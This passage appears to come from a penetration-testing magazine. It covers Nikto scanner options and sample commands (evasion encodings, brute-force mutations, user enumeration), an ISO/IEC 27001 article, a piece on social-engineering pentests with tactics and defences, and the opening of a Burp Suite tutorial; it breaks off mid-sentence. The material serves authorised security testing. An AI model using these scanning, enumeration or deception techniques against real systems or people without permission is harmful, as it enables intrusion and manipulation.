P – Print progress to STDOUT
V – Verbose output

-evasion

Specify the LibWhisker encoding/evasion technique to use (see the LibWhisker docs for detailed information on these). Note that these are not likely to actually bypass a modern IDS, but may be useful for other purposes. Use the reference number to specify the type; multiple may be used:

1 – Random URI encoding (non-UTF8)
2 – Directory self-reference (/./)
3 – Premature URL ending
4 – Prepend long random string
5 – Fake parameter
6 – TAB as request spacer
7 – Change the case of the URL
8 – Use Windows directory separator (\)
A – Use a carriage return (0x0d) as a request spacer
B – Use binary value 0x0b as a request spacer
Figure 5. Nikto options
-findonly
Only discover the HTTP(S) ports, do not perform a security scan. This will attempt to connect with HTTP or HTTPS, and report the Server header. Note that as of version 2.1.4, -findonly has been deprecated and simply sets ‘-Plugins “@@NONE”’ which will override any command line or config file settings for -Plugins.
-Format

Save the output file specified with the -o (-output) option in this format. If not specified, the default will be taken from the file extension specified in the -output option. Valid formats are:

csv – a comma-separated list
htm – an HTML report
msf – log to Metasploit
txt – a text report
xml – an XML report

-Help

Display extended help information.

-host

Host(s) to target. Can be an IP address, hostname or text file of hosts. A single dash (-) may be used for stdin. Can also parse nmap -oG style output.

-id

ID and password to use for Basic host authentication. The format is id:password.

-IgnoreCode

Ignore these HTTP codes as negative responses (always). The format is "302,301".

-list-plugins

List all plugins that Nikto can run against targets, then exit without performing a scan. These can be tuned for a session using the -Plugins option. The output format is:

Plugin name
full name – description
Written by author, Copyright (C) copyright

-maxtime

Maximum execution time per host, in seconds. Accepts minutes and hours, such that all of these are one hour: 3600s, 60m, 1h.

-mutate

Specify mutation technique. A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type; multiple may be used:

1 – Test all files with all root directories
2 – Guess for password file names
3 – Enumerate user names via Apache (/~user type requests)
4 – Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 – Attempt to brute force sub-domain names, assuming the host name is the parent domain
6 – Attempt to guess directory names from the supplied dictionary file

-mutate-options

Provide extra information for mutates, e.g. a dictionary file.

-nointeractive

Disable interactive features.

-nolookup

Do not perform name lookups on IP addresses.

-nocache

Disable the response cache.

-nossl

Do not use SSL to connect to the server.

-no404

Disable 404 (file not found) checking. This will reduce the total number of requests made to the web server and may be preferable when checking a server over a slow link, or an embedded device. It will generally lead to more false positives being discovered.
-output
Write output to the file specified. The format used will be taken from the file extension. This can be overridden by using the -Format option (e.g. to write text files with a different extension). Existing files will have new information appended. A single dot (.) may be specified for the output file name, in which case the file name will be automatically generated based on the target being tested. Note that the -Format option is required when
this is used. The scheme is: nikto_HOSTNAME_PORT_TIMESTAMP.FORMAT. For '-Format msf' the output option takes on a special meaning: it should contain the password and location of the Metasploit RPC service. For example, it may look like: -o msf:<password>@http://localhost:55553/RPC2.
-Plugins
Select which plugins will be run on the specified targets. A semi-colon separated list should be provided which lists the names of the plugins. The names can be found by using -list-plugins. There are two special entries: @@ALL, which specifies all plugins shall be run and @@NONE, which specifies no plugins shall be run. The default is @@DEFAULT.
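A sketch of plugin selection, using plugin names that appear later in this article (the host and output file name are illustrative):

```shell
# Run only the Apache user-enumeration plugin plus the XML report plugin
perl nikto.pl -h 192.168.1.5 -Plugins "apacheusers(enumerate);report_xml" -output users.xml
```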
-port
TCP port(s) to target. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80, 88, 90). If not specified, port 80 is used.
-Tuning

Tuning options control the tests that Nikto will use against a target. By default, all tests are performed. If any options are specified, only those tests will be performed. If the "x" option is used, the logic is reversed and only the specified tests are excluded. The given string is parsed from left to right; any x character applies to all characters to its right. Use the reference number or letter to specify the type; multiple may be used:

0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)

-Pause

Seconds (integer or floating point) to delay between each test.
-root

Prepend the value specified to the beginning of every request. This is useful for testing applications or web servers which have all of their files under a certain directory.
-ssl
Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.
-Save
Save request/response of findings to this directory. Files are plain text and will contain the raw request/ response as well as JSON strings for each. Use a “.” to auto-generate a directory name for each target. These saved items can be replayed by using the included replay.pl script, which can route items through a proxy.
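The save-and-replay workflow just described can be sketched as follows; the directory and saved file names are hypothetical and will differ per scan:

```shell
# Save raw request/response pairs for each finding into ./findings
# (use "." instead to auto-generate a directory name per target)
perl nikto.pl -h 192.168.1.5 -Save findings

# Later, replay one saved item with the bundled replay.pl script
perl replay.pl -file findings/saved-item.txt
```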
-timeout
Seconds to wait before timing out a request. The default timeout is 10 seconds.

-Userdbs

Load user-defined databases instead of standard databases. User-defined databases follow the same syntax as the standard files, but are prefixed with a 'u', e.g., 'udb_tests'. Options:

all – Disable all standard databases and load only user databases.
tests – Disable db_tests and load udb_tests. All other databases are loaded normally.
-until
Run until the specified time or duration, then pause. Durations in hours, minutes or seconds, like: 1h, 60m, 3600s. Times like “mm dd hh:mm:ss” (mm, dd, ss optional): 12 1 22:30:00.
-update
Update the plugins and databases directly from cirt.net.
-useproxy
Use the HTTP proxy defined in the configuration file. The proxy may also be directly set as an argument.
-Version
Display the Nikto software, plugin and database versions.
-vhost
Specify the Host header to be sent to the target.
Mutation Techniques
A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type; multiple may be combined.

• Test all files with all root directories. This takes each test and splits it into a list of files and directories. A scan list is then created by combining each file with each directory.
• Guess for password file names. Takes a list of common password file names (such as "passwd", "pass" and "password") and file extensions ("txt", "pwd", "bak", etc.) and builds a list of files to check for.
• Enumerate user names via Apache (/~user type requests). Exploits a misconfiguration in Apache UserDir setups which allows valid user names to be discovered. This will attempt to brute-force guess user names; a file of known users can also be supplied via the -mutate-options parameter.
• Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests). Exploits a flaw in cgiwrap which allows valid user names to be discovered. This will attempt to brute-force guess user names; a file of known users can also be supplied via the -mutate-options parameter.
• Attempt to brute force sub-domain names. This will attempt to brute force known domain names, assuming the given host (without a www) is the parent domain.
• Attempt to brute force directory names. This is the only mutate option that requires a file to be passed in the -mutate-options parameter. It will use the given file to attempt to guess directory names. Lists of common directories may be found in the OWASP DirBuster project.
Display
By default only some basic information about the target and vulnerabilities is shown. Using the -Display parameter can produce more information for debugging issues.
1 – Show redirects. This will display all requests which elicit a "redirect" response from the server.
2 – Show cookies received. This will display all cookies that were sent by the remote host.
3 – Show all 200/OK responses. This will show all responses which elicit an "okay" (200) response from the server. This could be useful for debugging.
4 – Show URLs which require authentication. This will show all responses which elicit an "authorization required" header.
D – Debug output. Show debug output, which shows the verbose output and extra information such as variable content.
E – Display all HTTP errors. Show details for any HTTP and communications errors encountered, which can produce a lot of output on some servers.
P – Print progress to STDOUT. Show a status report to STDOUT during testing (interval set in nikto.conf).
V – Verbose output. Show verbose output, which typically shows where Nikto is during program execution.
Scan Tuning
Scan tuning can be used to decrease the number of tests performed against a target. By specifying the type of test to include or exclude, faster, more focused testing can be completed. This is useful in situations where certain kinds of findings are not of interest – such as XSS or simply "interesting" files. Test types can be controlled at an individual level by specifying their identifier with the -T (-Tuning) option. In the default mode, if -T is invoked, only the test type(s) specified will be executed. For example, only the tests for "Remote file retrieval" and "Command execution" can be performed against the target. If an "x" is passed to -T, this will negate all tests of the types following the x. This is useful where a test may check several different types of exploit. The valid tuning options are:

0 – File Upload. Exploits which allow a file to be uploaded to the target server.
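The example invocations referenced above can be sketched as follows (the host is illustrative; -T takes concatenated type identifiers):

```shell
# Run only "Remote File Retrieval - Inside Web Root" (5) and
# "Command Execution / Remote Shell" (8) test types
perl nikto.pl -h 192.168.1.5 -T 58

# Run every test EXCEPT types 5 and 8 (the x negates what follows it)
perl nikto.pl -h 192.168.1.5 -T x58
```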
1 – Interesting File / Seen in logs. An unknown but suspicious file or attack that has been seen in web server logs (note: if you have information regarding any of these attacks, please contact CIRT, Inc.).
2 – Misconfiguration / Default File. Default files or files which have been misconfigured in some manner. This could be documentation, or a resource which should be password protected.
3 – Information Disclosure. A resource which reveals information about the target. This could be a file system path or account name.
4 – Injection (XSS/Script/HTML). Any manner of injection, including cross-site scripting (XSS) or content (HTML). This does not include command injection.
5 – Remote File Retrieval – Inside Web Root. Resource allows remote users to retrieve unauthorized files from within the web server's root directory.
6 – Denial of Service. Resource allows a denial of service against the target application, web server or host (note: no intentional DoS attacks are attempted).
7 – Remote File Retrieval – Server Wide. Resource allows remote users to retrieve unauthorized files from anywhere on the target.
8 – Command Execution / Remote Shell. Resource allows the user to execute a system command or spawn a remote shell.
9 – SQL Injection. Any type of attack which allows SQL to be executed against a database.
a – Authentication Bypass. Allows a client to access a resource it should not be allowed to access.
b – Software Identification. Installed software or programs could be positively identified.
c – Remote Source Inclusion. Software allows remote inclusion of source code.
x – Reverse Tuning Options. Perform exclusion of the specified tuning type instead of inclusion.
Replay Saved Requests

When using the Save functionality (-Save), findings' requests are saved in text files. While these files contain human-readable text, they also contain JSON representations of the request and response. The JSON request can be replayed using the "replay.pl" script, which reads and parses a saved file via the -file option and can optionally route the request through a proxy, such as Burp. This allows further exploration of vulnerabilities in a program better suited to replay and resend attacks (Figure 6).

Figure 6. Replaying Saved Requests

Plugin Selection

From Nikto 2.1.2, plugins can be selected on an individual basis and may have parameters passed to them. A plugin selection string may be passed on the command line through the -Plugins parameter. It consists of a semi-colon separated list of plugin names, with optional parameters placed in brackets. In its simple form, a plugin statement looks like:

plugin-name[(parameter-name[:parameter-value][,other-parameters])]

The parameters and plugin names can be found by running Nikto with -list-plugins (Figure 7). This also means the mutate options are deprecated and replaced with parameters passed to plugins, so the mutate options now internally translate to:
Figure 7. Listing available Plug-in in Nikto
• tests(all)
• tests(passfiles)
• apacheusers(enumerate,home[,dictionary:dict.txt])
• apacheusers(enumerate,cgiwrap[,dictionary:dict.txt])
• subdomain
• dictionary(dictionary:dict.txt)

Macros for commonly run plugin sets can also be defined in nikto.conf; the default ones are:

@@MUTATE=dictionary;subdomain
@@DEFAULT=@@ALL;-@@MUTATE;tests(report:500)
These are expanded by using -list-plugins and can be overridden through -Plugins. Altogether this allows a customised set of plugins to be run for a specific circumstance. For example, if a normal test brought up that the server was vulnerable to the Apache Expect header XSS attack and we want to run a test, with debugging, just to confirm that it is vulnerable, we can run:

nikto.pl -host targets.txt -Plugins "apache_expect_xss(verbose,debug)"

And then manually check the output to see whether it was truly vulnerable. It should be noted that reports are also plugins, so if you need to customize the plugin string and want an output, include the report plugin:

nikto.pl -host targets.txt -Plugins "apacheusers(enumerate,dictionary:users.txt);report_xml" -output apacheusers.xml

Output and Report Export Formats

Nikto allows output to be saved in a variety of formats, including text, CSV, HTML, XML, NBE and exporting to Metasploit. When using -output, an output format may be specified with -Format. If no -Format is specified, Nikto will try to guess the format from the file extension. If Nikto cannot guess the file format, output will only be sent to stdout. The DTD for the Nikto XML format can be found in the 'docs' directory (nikto.dtd).

HTML and XML Customisation

HTML reports are generated from template files located in the templates directory. Variables are defined as #variable-name and are replaced when the report is generated. The files htm_start.tmpl and htm_end.tmpl are included at the beginning and end of the report (respectively). The htm_summary.tmpl also appears at the beginning of the report. The htm_host_head.tmpl appears once for every host, and the htm_host_item.tmpl and htm_host_im.tmpl appear once for each item found on a host and each "informational message" per host (respectively). All valid variables are used in these templates; future versions of this documentation will include a list of variables and their meaning. The copyright statements must not be removed from htm_end.tmpl without placing them in another of the templates; it is a violation of the Nikto licence to remove these notices.
ISO 27001
4 misconceptions about ISO/IEC 27001

If you intend to implement ISO/IEC 27001, you don't need to read this article. But if you have given up on implementing this standard because of its alleged disadvantages, you do.
This article tries to deconstruct some of the misconceptions about ISO/IEC 27001. This security management standard is said to require the introduction of control activities into normal business and IT operations, which consequently increases the workload and causes operational inefficiencies. To unravel these allegations we will look at four issues, but first we'll start with an opening question: does your organization actually need ISO/IEC 27001?
Do you need (a structured) security management?
An organization with a low risk exposure and a non-demanding legal environment may achieve a good level of security management without a structured approach. But an organization that has an increasing risk exposure (e.g. Bring Your Own Device) and faces changing security requirements needs a systematic approach to identify business and legal requirements, to understand how those requirements may be put in jeopardy by risks, and to control these risks with appropriate measures. However, regardless of the risk exposure and external factors, the most important driver for security is, obviously, the business. This is evident considering that most ISMS scope descriptions (almost 40%) are related to services provided
to external customers (this figure is based on a study of 126 ISMS scope descriptions, performed by the author in his dissertation; a full-text version is available at http://hdl.handle.net/10071/661). Therefore, depending on the business, risk and environment, an organization may adopt a structured approach to plan, implement and verify whether it has controls adequate to its risks, or, in other words, an Information Security Management System (ISMS). Now that we have established the concept of an ISMS, we may address its misconceptions.
An ISMS requires the adoption of hundreds of unnecessary controls
Contrary to the presumption that compliance with ISO/IEC 27001 demands hundreds of controls, the standard only requires the implementation of a small group of measures and entrusts organizations with the decision to implement, or not, most of the controls. ISO/IEC 27001 has two categories of measures: (a) mandatory requirements, deemed fundamental for any management system, and (b) selective safeguards, which are chosen based on the assessment of the risks affecting the assets in the ISMS scope. The mandatory requirements, inherited from other management systems such as ISO 9001, define
Page 22
http://pentestmag.com
the basic activities that support security management. These activities, illustrated in Figure 1, interact with each other. For example, a modification of the security policy, performed by the security planning process, or a change in the ISMS scope (e.g. a new asset in the scope) has to be tackled by the risk management process. If there is a significant change in the scope or in the security requirements, then a risk assessment should be performed. If an identified risk requires an adjustment of the existing controls, then the security measures must be adapted or implemented accordingly. Consequently, the related documentation must be modified (addressed by the documents and records process) and the employees informed and trained. Finally, the measurement of control effectiveness, regular audits and incident management will provide input to the identification of improvements (through preventive and corrective action). The second type of requirement of ISO/IEC 27001 is selective safeguards. As seen in Figure 1, all risks identified within the ISMS scope which are considered unacceptable by the organization have to be addressed by safeguards, which must be mapped against a catalogue of controls:
ISO/IEC 27002. ISO/IEC 27002, formerly known as ISO/IEC 17799, is a list of controls structured into 11 domains and 133 controls, as seen in Figure 2. Therefore, there is no predefined number of measures that an organization must adopt to achieve ISO/IEC 27001 certification: it has to implement the mandatory requirements and select from ISO/IEC 27002 the controls which are applicable to its identified risks.
Even with a small ISMS scope, an organization achieves a high level of security
One frequent misconception about ISO/IEC 27001 is the assumption that simply by having a confined area of the organization certified, the entire organization has a high level of protection. ISO/IEC 27001 entitles organizations to restrict the application of the security management system to a particular area, as long as this area is core to the business, i.e. the assets and processes placed under the ISMS scope should be relevant to the organization's business (e.g. mortgage loans in a retail bank). Despite this requirement of business relevance of the scope, some organizations tend
Figure 1. Information Security Management Systems (ISMS). Diagram labels: ISMS Scope (assets related to a specific process or area in the organization); Plan (Security Planning; Risk Management; applicable safeguards; controls mapped with ISO/IEC 27002); Implement (Operate Controls; Control Documents and Records; Train Human Resources); Monitoring (Measurement of Controls; Internal Audits; Incident Management); Improvement Follow-up.
to propose for certification areas which are more amenable to being placed under management systems (e.g. organizational units with more stable activities, performed by unchanging resources and with clear interfaces to internal and external entities), but which possess less business importance. Nevertheless, the purpose sought by organizations in restricting the ISMS scope is not fully accomplished. Although an ISMS applied to just a part of the organization, rather than the whole of it, enables a reduction in the number of assets to be assessed by risk management, this reduction of effort does not occur in the implementation of controls, because some countermeasures (e.g. security awareness, configuration baselines for IT systems) can only be effective when implemented across the organization. Therefore, implementing the ISMS in a small organizational scope may facilitate the initial implementation, but will limit the benefits of running an ISMS to a part of the organization, while maintaining the inherent costs of managing its controls.
An ISMS implies an additional workload for the business
Implementing an ISMS will, in most organizations, require the introduction of new countermeasures, new responsibilities and new documentation. The actual weight of running a security management system depends, in part, on the way the system was developed in the organization. If the ISMS was implemented as an additional group of processes alongside normal business activities, then the system tends to work as a closed box, opened only when needed. But if the ISMS was developed to be part of normal operations, so that security activities are integrated into business processes (e.g. security planning and review is a regular topic on the agenda of directors' meetings), then the ISMS will be a valuable tool for increasing the protection of the organization.
Some people argue that running a management system implies more control activities, which increases the normal workload and may even require dedicated employees (e.g. a security officer). This assumption is not confirmed by several certified organizations. In one organization where the author participated in the ISMS implementation, ISMS-related activities did not represent, on average, more than 5% of employees' working time, and even the employee who held the position of security officer did not spend more than 20% of his working time managing the ISMS. Consequently, although an ISMS demands new responsibilities (a new job function – security officer – and some new control activities, in particular for the IT department and for the organizational unit under the ISMS scope), it does not require dedicated employees.
An ISMS requires a supporting tool
A certified organization must produce records of its security activities for auditing purposes. These records should attest to the Plan-Do-Check-Act (PDCA) steps of the security processes: defining requirements based on risk assessments, planning the implementation of security measures, controlling them and evaluating their results. It is commonly believed that, to support the PDCA activities, an organization should be equipped with tools to automate risk assessments and to provide a central repository for all security records and documents (e.g. security policies and procedures). This idea, however, is not corroborated by the standard, which in fact does not mention the need for any supporting tool, leaving the organization free to choose any instrument to manage its ISMS, as long as it is adequate to the size and complexity of the organization's ISMS.
Conclusions
Figure 2. Domains of ISO/IEC 27002: Security Policy; Organizational Security; Asset Management; Access Control; Human Resource Security; Physical and Environmental Security; Communications and Operations; Acquisition, Development and Maintenance of Systems; Incident Management; Business Continuity; Compliance Management

OPEN 01/2013

Paulo Coelho
Paulo Coelho works in a Big Four consultancy firm, where he participated in several ISO/IEC 27001 projects. He holds several information security certifications (ISO/ IEC 27001 Lead Auditor, CISSP, CISA) and is a member of the Portuguese IT Security Normalization Commission (part of ISO structure). More information about him is available at http://www.linkedin.com/in/paulocoelho.
Page 24
http://pentestmag.com
ISO 27001
Testing Your Most Valuable Assets
When thinking about information security, we can sometimes be forgiven for thinking that technology is the answer to all our security problems. Though a little rarer these days, hardware and software products are often sold as the 'silver bullet' to solve all our security or compliance woes, but it is actually people who represent the core operating component of any business, and who are therefore both a very real threat and a blessing to our infrastructure and its layered Information Security Management System.
It is therefore people who are ultimately responsible for the success or failure of security in an organisation, and it is they who need to be considered most within the scope of our security testing. In the case of trusted DBAs, for example, a business can have all the available technical measures in place, such as encryption, logging, application firewalling, robust access controls and a host of endpoint security, but a simple copy to a cheap USB storage device, a shared access area or an email out of the business can breach, undermine and lay waste to the best technical defences. In other words, businesses spend millions on technical isolation and protection which, with a £5 USB key, can be maliciously or accidentally bypassed and breached. It is reasonably safe to say that people are the most valuable and highest-risk assets operating within our boundaries, so it should go without saying that they are able, at a second's notice, to circumvent security and compliance measures, ignore policy and compromise business data with the press of a button, either maliciously or by accident. To top this all off, they are an asset whose failure you cannot control or anticipate, and they are open to unknown external pressures that you
cannot easily probe, measure, quantify and neatly audit. You may think this is a pessimistic, even fatalistic view, but this is not the case.
As I sit here, I cannot think of one time in my career (and let's just say it stretches back further than I care to remember!) where a human wasn't directly or indirectly involved to some degree in a large-scale breach or data loss. Furthermore, on the 90th birthday of George Blake, arguably the most famous of double agents, who passed the names of some 40 MI6 agents to the Russians, many of whom were subsequently executed, we can recall news of some of the most secure military establishments leaking secrets to foreign powers, all breached by trusted and vetted individuals like Blake. So the purpose of this article is to highlight controls that are applicable to humans from a risk management perspective and to help you understand
the nature of humans, which is critically important to the security of information systems, yet is something we technical security practitioners routinely ignore or overlook entirely.
Baseline
We are all here to ensure the confidentiality, integrity and availability of data and information. We can also say that we are looking to ensure information and data authenticity, accountability in its use, non-repudiation and the security reliability of business assets, systems and processes. That all sounds good to me. As a basic premise, all businesses should operate to standards such as ISO 27001, with policies, risk management processes and tight security procedures in place across the whole enterprise.
Table 1. Human vulnerabilities mapped to exploits. NIST Special Publication 800-30 (Human Threats: Threat-Source, Motivation, and Threat Actions) presents a similar table in a slightly different manner, adding motivation to the normal risk calculations.

Trait: Negligence
Vulnerability: Not meeting multiple policy requirements, i.e. poor password use; poor system configuration; failure to maintain up-to-date AV pattern files; poor email and Internet usage; weak access control lists; transferring sensitive data without protection.
Exploit or advantage: Privilege escalation; virus or malware infection; wireless breach due to weak access control and/or encryption.

Trait: Power
Vulnerability: Respect, concern or apprehension of management figures; worry about not meeting deadlines.
Exploit or advantage: Spoofing management to create, delete or modify accounts and system configs; password resets for irate or angry managers.

Trait: Awareness
Vulnerability: Weak system knowledge or use; unaware of correct actions; unsure how mandated or strict certain controls are; no structure to security best practice or frameworks.
Exploit or advantage: Creating a 'path of least resistance' through a system; bypassing controls; degradation of controls; phishing, pharming and social engineering.

Trait: Motivation (lack of)
Vulnerability: Reduced or no incentive or drive to report weaknesses; no impetus for continual improvement; no management backing or driving forces to support ideas or improve structures.
Exploit or advantage: Degradation of controls over time; no reporting or action structure to alert to a breach; increased risk of malicious or mischievous actions.

Trait: Helpfulness
Vulnerability: Bypass of controls; removal of controls to help pass information quickly; doing someone a favour.
Exploit or advantage: Tailgating (holding the door open for the person behind); social engineering; bribery; critical information stored or transmitted in the clear or without due controls.

Trait: Maliciousness
Vulnerability: Wish to seek revenge on a person or the business; open to fraud or blackmail attempts; greed or self-indulgence.
Exploit or advantage: Use of colleague credentials to commit fraud; wilful breach of systems; removal of data or information for the next job; removal of data for financial gain.

Trait: Confidence
Vulnerability: Overconfidence in system controls; under-confidence in processes.
Exploit or advantage: Expectation that any issue is 'in hand'; pride (not reporting, or allowing a process to continue); a conceited approach of knowing better.
Of course we all know that a business can never be 100% secure, and I'm sure you've seen and written some devastating reports in your time. We also know from experience that what is written in the various security policies and standards is not necessarily what is implemented in reality. As people represent some 60% of the operating system in terms of being assets (ignoring the fact that they are users too), failure to understand the working nature of these assets will ultimately raise the risk to, and impact on, the system.
The challenge
The NIST publication lists motivations such as: monetary gain; ego; economic espionage; rebellion; curiosity; illegal information disclosure; destruction of information; data alteration; competitive advantage; blackmail; exploitation; revenge; and unintentional errors and omissions. A few of my own, added through experience, are: defacement; kudos; just for a laugh (for the 'lulz'); and perceived justice, or attacking perceived injustices.
Motivation, therefore, is very important and key to how a vulnerability is exploited, and it must clearly be added to any risk-based process where employees or people form part of the operating procedure.
Social Engineering
The stand-alone test that complements any technical pentest is the physical pentest, and the key process for gaining most, if not all, of the information and data required for a successful physical penetration test is social engineering.
Human & Technical Vulnerabilities
Human threats, as defined by NIST Special Publication 800-30, are events that are either enabled by or caused by human beings, such as unintentional acts (inadvertent data entry) or deliberate actions (network-based attacks, malicious software upload, unauthorized access to confidential information). Human vulnerabilities, defined here as personal shortcomings, carelessness, bad habits, maliciousness and certain behavioural attitudes to the world around us, can easily be linked to the exploits of the technical vulnerabilities which we as security practitioners seek to eliminate. Though certainly not exhaustive, Table 1 maps certain personal and behavioural traits to technical and general security exploits.
There are several definitions of social engineering, but it is essentially the act of obtaining information through deception. Like technical pentesting, it exploits vulnerabilities, in this case in our own human nature; one such tendency is trust. As previously outlined, an attacker might pretend to be an employee seeking innocuous information, try to convince you that an exception to the rule is okay because of the urgency of the situation, or just act like he or she belongs somewhere he or she really shouldn't be. Perhaps surprisingly to some, the approach and methodology used to carry out a socially engineered physical pentest should closely follow that of a technical penetration test.
Reconnaissance
Getting as much information as possible about the business, its people or individual operations from internal knowledge or public websites, such as the company's own website or social sites like LinkedIn, Facebook and Twitter.
Scanning
Assessing and evaluating the people themselves and making notes about their character, how observant they are and their normal modes of operation, such as their curiosity and helpfulness. Are they stressed in their job and therefore not paying full attention, or even bothered by what happens around them?
Gaining Access or Exploitation
This can be a building, facility or room, or getting close (personally and spatially) to a person. This could mean gaining trust or playing on traits such as kindness and helpfulness (social engineering) to help exploit any obvious vulnerability, or tailgating and playing on people's inherent trust of the individual behind them, or their reluctance to challenge strangers.
Maintaining Access
A longer-term process whereby a relationship is built and maintained to help preserve or obfuscate the exploit.
Covering Your Tracks
The removal of all information that would or could lead to your real identity. This would include backing up fabricated stories with fake 'evidence'.
Defending against Social Engineering
As social engineering is an attack on human nature, there are no technical signatures we can use to detect it or its influence on us. However, there are various signals or pointers that give away areas of weakness within ourselves, the way we conduct ourselves or the way we manage others. Some are briefly mentioned in the mapping table; however, Kevin Mitnick's 'The Art of Deception' outlines six tendencies of human nature that he, as one of the earliest and most famous of 'hackers', used successfully and often.
Authority
We have a natural tendency to comply with figures of authority. For example, an attacker might persuade you to help by misrepresenting themselves as a fellow pentester, as an executive in the company, or as an employee who supports an executive. In this process we easily fall foul of the natural need to unquestioningly follow a directive for fear of some form of disloyalty.
Liking
We all have a tendency to help those we like or are bonded to in some way, so an attacker might try to convince us that they have something in common with us, claiming, for example, similar interests, hobbies, beliefs, goals, attitudes or even hometowns.
Reciprocation
An excellent sales technique: we wish to help those who have already done something to help us. This could come in the form of an attacker posing as a member of support staff who claims to have done something to protect you or your system. In return, we are more likely to acquiesce to handing over, or allowing, something that can be exploited.
Consistency
We have a very strong built-in tendency to comply once we have made a verbal or written promise or commitment to help. One example is being convinced to comply with a new 'company policy' that states your password must be reset, or set so that it can be easily guessed.
Social Validation
Another strong tendency is to unquestioningly follow the examples of others. This has a knock-on effect that effectively spreads the exploit like a virus.
Page 29
http://pentestmag.com
Scarcity
This tendency covers greed, arrogance and simple competitiveness: we are asked to comply when an object being sought is deemed valuable and attractive, is in short supply, creates competition or is only available for a limited time (spot the sales technique again?). For example, an email to company employees claiming that the first person to reply will win something is a clear way of getting people to think about a positive result rather than the negative action they may be undertaking. Phishing sites use this to great effect, coaxing people into registering with or using a bogus website; in this way, usernames and passwords can easily be captured.
Solutions or Mitigation Strategies
Again, due to the non-technical nature of the attacks, the best defences are non-technical and rely upon personal interaction.
Like the pieces of a jigsaw puzzle, everything should fit together neatly and work for the common good. High-quality, frequent awareness training and relevant, current and tailored security policies are therefore the best way to defend against covert or overt social engineering. Through training and general awareness, employees need to understand what social engineering is and how to respond to suspicious inquiries. It may sound obvious, but only through constant reminders and management support can employees be truly effective in identifying these types of attacks and responding appropriately. Mitnick's attack vectors are as true today as they were in the 1970s and 1980s. It may seem like an uphill battle to work through our belief that 'it will never happen to us', but employees should be encouraged to maintain a defensive attitude and err on the side of caution when they answer the phone, respond to an email or hold the door open for somebody.
Security policies, on the other hand, establish solid, legal accountability and provide clear guidelines. In addition to publishing security policies, all employees should be trained to ensure they understand their role and how the policies apply to them, and the policies should be tailored to suit. Employees should report potential security incidents and be given clear instructions on how to report that information. They also need to understand the consequences of violating these policies. Security policies are for everyone to uphold, maintain and abide by, not just IT: people should be reminded that they play a key role in the security of their organisation and that it is a shared responsibility.
In conclusion, adding this physical pentest procedure to complement the technical arsenal should be seen as a valuable addition. It also helps those of us in security roles to remember that good information security is only as strong as the weakest link and, although this is something we hear time and time again, it is far too easy to forget that the weakest link is also the most important asset of all: people.
Alan Cook
Alan is an information security expert who served in the military for over 23 years, holding a Diplomatic Passport as data custodian. Alan then joined a global bank as the UK's lead security officer before moving into the retail and gaming sector, driving in regulatory frameworks such as ISO 27001 and PCI DSS. Before joining the Agenci, Alan was the Information Security Officer and Senior IT Auditor for a large, global gaming business with a major online and high-street presence.
BURP SUITE
Burp Suite
Automated and Manual Processes Used to Identify Vulnerabilities
As most penetration testers know, no amount of automated tooling can replace a real-life pentester. Sure, in our testing we use automated tools to assist and speed up the process, but when you really get down to it there is no substitute for doing it yourself. This article will go through some of the more commonly used components of the PortSwigger Burp Suite, looking at the automated and manual processes that can be used to identify vulnerabilities in web applications, and at how to leverage both methods to get the most out of the Burp Suite.
Unfortunately, fully detailing all the components of the Burp Suite would require writing a full book. Luckily this has already been done for us, so my intention in this article is for you to have a practical understanding of some of the Burp Suite's basic functionality by the time you finish reading. To get the most out of this article, I would advise reading it while sitting in front of your computer, trying out the steps as you progress. Throughout this article we will be using Burp Professional 1.5.rc3 with the Firefox 14.01 browser to attack an almost-default installation of WordPress 3.4.2. I say almost because, in order to make the testing a bit more realistic, I have created a few users and published a few posts to give us something to work with. I've set up the WordPress install locally on my machine and given it the name example.com, which I have included in my hosts file. To get the most out of this test we'll be taking a 'black box' approach – that is, we'll be simulating having no prior knowledge of the application!
Getting Burp
As mentioned earlier, we're using the professional edition of the Burp Suite for this article. While the free edition is quite useful for light testing, for serious penetration testing you will need the professional edition. Luckily you can request a free trial of the suite from www.portswigger.net, so you can try before you buy.
Intro to Burp
So before we begin we should get to know Burp a bit better. Burp has several components which can be used for a variety of purposes: a proxy for intercepting and modifying traffic between our browser and the target application; a spider for crawling the applications we are testing; a web application scanner which will automatically detect many types of vulnerabilities; a repeater that dramatically cuts down the time involved in manipulating and sending multiple requests to an application; an intruder tool we can set up to run hundreds of attacks in quick succession against application parameters; and finally a tool for testing application session tokens to determine their randomness. As always, it's important to remember that tools such as the Burp Suite can be damaging to the applications you are testing, and you should always have written permission from the owner of the site before you begin testing!
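As a crude illustration of the last of those components, the randomness of a sample of session tokens can be approximated by measuring character-level Shannon entropy. This is only a sketch of the idea, not Burp's actual methodology; its sequencer runs far more rigorous statistical tests:

```python
import math
from collections import Counter

def shannon_entropy(tokens: list[str]) -> float:
    """Bits of entropy per character across a sample of session tokens."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

# A constant token has zero entropy; tokens drawn from a wider
# character set with an even distribution score higher.
```

A token generator whose output scores close to zero here would be trivially predictable, which is exactly the weakness the sequencer is designed to surface.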
Getting started
When you open Burp you will be presented with a number of tabs at the top of the program. We’re
